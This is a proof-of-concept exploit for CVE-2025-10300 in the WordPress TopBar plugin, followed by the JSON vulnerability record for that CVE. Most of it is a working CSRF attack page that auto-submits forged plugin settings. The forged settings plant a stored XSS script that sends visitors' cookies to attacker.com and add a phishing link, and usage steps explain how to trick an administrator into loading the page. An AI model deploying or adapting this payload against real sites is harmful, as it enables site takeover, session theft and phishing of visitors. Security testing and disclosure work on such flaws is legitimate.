CVE-2025-10300

<!-- CVE-2025-10300 PoC: CSRF exploit for WordPress TopBar Plugin --> <!-- This PoC demonstrates how an unauthenticated attacker can forge a request to update TopBar plugin settings --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Loading...</title> </head> <body> <!-- Auto-submit form to exploit missing nonce validation in fme_nb_topbar_save_settings() --> <form id="csrf-form" action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="action" value="fme_nb_topbar_save_settings" /> <!-- Inject malicious content into TopBar notification --> <input type="hidden" name="fme_nb_topbar_message" value="<script>alert('XSS via CSRF - CVE-2025-10300');document.location='http://attacker.com/steal?cookie='+document.cookie;</script>" /> <input type="hidden" name="fme_nb_topbar_status" value="enabled" /> <input type="hidden" name="fme_nb_topbar_link" value="http://attacker.com/phishing" /> <input type="hidden" name="fme_nb_topbar_bg_color" value="#000000" /> <input type="hidden" name="fme_nb_topbar_text_color" value="#ffffff" /> <!-- Submit button (can be auto-clicked via JavaScript) --> <input type="submit" value="Click me to win!" /> </form> <script> // Auto-submit the form when victim visits this page // No nonce token is required due to the vulnerability document.getElementById('csrf-form').submit(); </script> </body> </html> <!-- Usage Instructions: 1. Host this HTML on an attacker-controlled server 2. Trick an authenticated WordPress admin into visiting the page 3. The browser will automatically submit the form with the admin's session cookies 4. The TopBar settings will be updated with the malicious content 5. The malicious script will execute for all visitors viewing the TopBar notification -->

{"cve": {"id": "CVE-2025-10300", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:39.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The TopBar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the fme_nb_topbar_save_settings() function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/topbar/trunk/admin/class-fme-nb-topbaradmin.php#L131", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/topbar/trunk/admin/class-fme-nb-topbaradmin.php#L38", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/topbar/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8e68cb68-45ab-4c2f-a105-1ef01da42453?source=cve", "source": "[email protected]"}]}}